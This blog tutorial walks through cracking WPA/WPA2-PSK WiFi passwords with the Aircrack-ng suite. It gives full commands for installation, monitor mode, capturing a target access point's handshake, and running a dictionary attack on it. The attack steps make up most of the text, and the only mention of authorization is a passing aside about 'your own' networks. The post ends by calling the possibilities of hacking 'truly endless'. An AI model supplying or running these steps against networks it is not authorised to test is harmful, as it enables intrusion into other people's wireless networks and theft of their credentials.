I probably don’t have to tell you why a password cracking tool is nice to have. Even more, I shouldn’t have to explain the benefits of hacking WiFi – especially your own. So let’s get straight to it.
The tool you want to use here is Aircrack-ng.
“Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.”
It’s recommended to install it manually.
Installation for Linux users:
- (sudo) apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
- wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O – | tar –xz
- cd aircrack-ng-1.2-rc4
- make install
- aircrack-ng –help (make sure you have the latest version)
Setting up Aircrack-ng:
- (sudo) airmon-ng check kill
- airmon-ng start wlan0
- airodump-ng mon0
- airodump-ng -c 1 –bssid 00:11:22:33:44:55 -w WPAcrack mon0 –ignore-negative-one
- -c = wireless network channel
- –bssid = MAC address of access point
- -w = file name prefix for authentication handshake
- mon0 = wireless interface
- –ignore-negative-one = fixes ‘fixed channel: -1’
- Wait until handshake is captured
The Password Dictionary
There is a significant part of cracking any password – and that is easily the password dictionary. They’re necessary for success. You will not have any luck if your password database is weak with minimal options. Be sure to check out the different password dictionary available.
To obtain the password for WPA/WPA2-PSK connections, use the command: aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
- -w = dictionary file name
- -b = mac address of access point
- cap = file name that contains authentication handshake
Don’t forget that cracking passwords takes patience, as does learning the mechanisms behind the tools involved. If you take the time to research different tutorials and guides, you will get the hang of hacking WiFi – and many other things – in no time.
And when you know what you’re doing, the possibilities are truly endless.
Latest posts by Unallocated Author (see all)
- How to choose a reliable VPN provider for 2019 - January 23, 2019
- How To Ensure Spam Protection And Secure Your Website - January 8, 2019
- Watch Netflix Content From Wherever - December 10, 2018